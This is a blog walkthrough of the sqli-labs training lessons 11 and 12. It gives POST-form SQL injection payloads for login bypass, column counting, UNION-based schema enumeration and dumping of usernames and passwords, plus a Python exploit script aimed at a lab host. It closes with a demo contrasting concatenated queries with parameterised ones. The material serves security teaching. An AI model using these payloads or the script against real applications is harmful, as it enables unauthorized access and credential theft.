Sqli-labs Review: Less 11-12 Error-based SQL Injection - POST

Copyright notice: this is an original serialized article by the blogger; to keep the content continuous, it may not be reproduced without the blogger's permission. https://blog.csdn.net/Kevinhanser/article/details/81592484

I worked through sqli-labs once before; this is a second pass to consolidate it, with all the code typed out by hand to make it stick.

Sqli-labs blog index

Error-based SQL injection

Functions used

group_concat(): concatenates the values of all matching rows into one string, so a single query returns many entries. A second expression is appended to each value before the separator, which is why the payloads below pass 0x20 (a space) and the results read "emails ,referers ,...".

distinct: drops duplicate values before concatenation

Less-11 Error-based SQL injection - single quotes

  1. Test

    Less-11 concatenates both fields straight into the query: SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
    Enter admin' or '1'='1 # in username
    Enter anything in password
    Note that the # here lands inside the literal '1 #', so '1'='1 #' is false; the login still succeeds because username='admin' matches on its own. admin'# closes the quote and comments out the password check directly.

  2. Find the number of columns

    1' order by 2# // login fails, no output: the query is valid, but no row has username '1'
    1' order by 3# // login fails, error: Unknown column '3' in 'order clause'

    So the query selects 2 columns.

  3. Find the database name

    1' union select 1,@@version#
    1' union select 1,(select database() limit 0,1)#
    1' union select 1,(select group_concat(distinct table_schema,0x20) from information_schema.tables limit 0,1)#

    Because username '1' matches nothing, the UNION row is the one displayed: the first column appears after "Your Login name:" and the second after "Your Password:", so the data to extract goes in the second column. (The original payloads wrote distinct+table_schema; the + is a habit from GET payloads, where it encodes a space. Typed literally into the form it reaches MySQL as a unary +, which MySQL treats as a no-op, so both forms work.)

    Result: information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. Find the table names

    1' union select 1,(select group_concat(distinct table_name,0x20) from information_schema.tables where table_schema='security') #

    Result: emails ,referers ,uagents ,users

  5. Find the column names

    1' union select 1,(select group_concat(distinct column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security')#

    Result: id ,username ,password

  6. Dump the data

    1' union select 1,group_concat(distinct username) from security.users #
    1' union select 1,group_concat(distinct password) from security.users #

    Results:

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
    Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
    
  7. Run the script

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-

    import re
    import requests

    # Less-11 reads uname / passwd / submit from an application/x-www-form-urlencoded
    # POST body. requests URL-encodes the dict, so the payload is written as plain SQL;
    # MySQL's '#' comments out the trailing "' and password='...' LIMIT 0,1".

    def post_login(url, uname):
        data = {"uname": uname, "passwd": "aaa", "submit": "Submit"}
        return requests.post(url, data=data, timeout=10).text

    def verify(url):
        print("verify start...")
        # md5(123) = 202cb962ac59075b964b07152d234b70. If that hash is echoed back,
        # MySQL evaluated the injected UNION row, so the field is injectable.
        body = post_login(url, "1' union select md5(123),group_concat(password,0x20) from users #")
        if "202cb962ac59075b964b07152d234b70" in body:
            print("Target is vulnerable to SQL injection!")
            return True
        return False

    def exploit(url):
        print("exploit start...")
        result = {}
        for column in ("username", "password"):
            # Only the second UNION column is echoed (after "Your Password:"),
            # so the group_concat goes there and the first column is padding.
            body = post_login(url, "1' union select 1,group_concat(distinct {0}) from security.users #".format(column))
            # Capture everything after "Your Password:" up to the next HTML tag.
            m = re.search(r"Your Password:(.*?)<", body)
            result[column] = m.group(1).strip() if m else ""
        print("usernames: {username}\npasswords: {password}".format(**result))
        return result

    if __name__ == "__main__":
        target = "http://10.10.10.130/sqli-labs/Less-11/"
        if verify(target):
            exploit(target)
    

Less-12 Error-based SQL injection - double quotes

  1. Test

    Less-12 wraps each field in double quotes and parentheses: SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1
    Enter admin") or ("1")=("1 # in username
    Enter anything in password
    As with the single-quote version, the # lands inside the literal "1 #", so ("1")=("1 #") is false and the login succeeds because username=("admin") matches by itself; admin")# is the shorter form.

  2. Find the number of columns

    1") order by 2# // login fails, no output
    1") order by 3# // login fails, error: Unknown column '3' in 'order clause'

  3. Find the database name

    1") union select 1,@@version#
    1") union select 1,database()#
    1") union select 1,(select group_concat(distinct table_schema,0x20) from information_schema.tables)#

    Result: information_schema ,challenges ,dvwa ,mysql ,owasp10 ,security ,tikiwiki ,tikiwiki195

  4. Find the table names

    1") union select 1,(select group_concat(distinct table_name,0x20) from information_schema.tables where table_schema='security') #

    Result: emails ,referers ,uagents ,users

  5. Find the column names

    1") union select 1,(select group_concat(distinct column_name,0x20) from information_schema.columns where table_name='users' and table_schema='security')#

    Result: id ,username ,password

  6. Dump the data

    1") union select 1,group_concat(distinct username) from security.users #
    1") union select 1,group_concat(distinct password) from security.users #

    Results:

    Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
    Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
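Less-11 and Less-12 differ only in how the PHP code quotes the input; the column count, UNION and group_concat(distinct ...) steps are identical. The example below is added here and is not code from the original post or from sqli-labs: it rebuilds the two query templates as string concatenation, runs the Less-11 payloads from steps 1, 2 and 6 against an in-memory SQLite table seeded with a constructed subset of the users rows dumped above, and contrasts them with a parameterised query. Two assumptions: SQLite stands in for MySQL, so the payloads end in "-- " rather than "#" (SQLite has no "#" comment; MySQL accepts both), and the Less-12 template is only rendered, not executed, because SQLite treats double quotes as identifiers rather than string literals.

```python
import sqlite3

# Query templates as the Less-11 and Less-12 PHP builds them: the form fields are
# concatenated into the SQL text with no escaping. Less-11 wraps the input in
# single quotes, Less-12 in ("...").
TEMPLATES = {
    "Less-11": "SELECT username, password FROM users WHERE username='{u}' and password='{p}' LIMIT 0,1",
    "Less-12": 'SELECT username, password FROM users WHERE username=("{u}") and password=("{p}") LIMIT 0,1',
}

# Constructed subset of the security.users rows shown on the page.
USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (8, "admin", "admin"),
    (9, "admin1", "admin1"),
]


def render(lesson, uname, passwd):
    """Return the SQL text the PHP code would hand to MySQL for these inputs."""
    return TEMPLATES[lesson].format(u=uname, p=passwd)


def seed():
    """In-memory SQLite stand-in for the security database (assumption: SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def login_vulnerable(db, uname, passwd):
    """Less-11 behaviour: the first matching row, None (login failed, no output),
    or the database error text (login failed, error)."""
    try:
        return db.execute(render("Less-11", uname, passwd)).fetchone()
    except sqlite3.Error as e:
        return "error: " + str(e)


def login_fixed(db, uname, passwd):
    """Same lookup with bound parameters: the input is data and cannot change the query."""
    sql = "SELECT username, password FROM users WHERE username=? and password=? LIMIT 0,1"
    return db.execute(sql, (uname, passwd)).fetchone()


def demo():
    db = seed()
    out = {}
    # Step 1: close the quote and comment out the password check.
    out["bypass"] = login_vulnerable(db, "admin'-- ", "anything")
    # Step 2: ORDER BY probes. 2 is accepted, 3 raises an error, so the query has 2 columns.
    out["order2"] = login_vulnerable(db, "1' order by 2 -- ", "x")
    out["order3"] = login_vulnerable(db, "1' order by 3 -- ", "x")
    # Step 6: username '1' matches nothing, so the UNION row is what gets displayed;
    # the second column is echoed after "Your Password:", so the dump goes there.
    out["dump"] = login_vulnerable(db, "1' union select 1,group_concat(distinct username) from users -- ", "x")
    # The same bypass against the parameterised query matches no row.
    out["fixed"] = login_fixed(db, "admin'-- ", "anything")
    return out


if __name__ == "__main__":
    print(render("Less-11", "admin' or '1'='1 #", "x"))
    print(render("Less-12", 'admin") or ("1")=("1 #', "x"))
    for name, value in demo().items():
        print(name, "->", value)
```

The two render() lines make the quoting difference visible: with both page payloads the # ends up inside the last string literal, so the comparison is false and it is the match on admin alone that logs you in. The ORDER BY probe relies on the error being shown, which is what makes these "error-based" lessons faster than the blind ones.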
    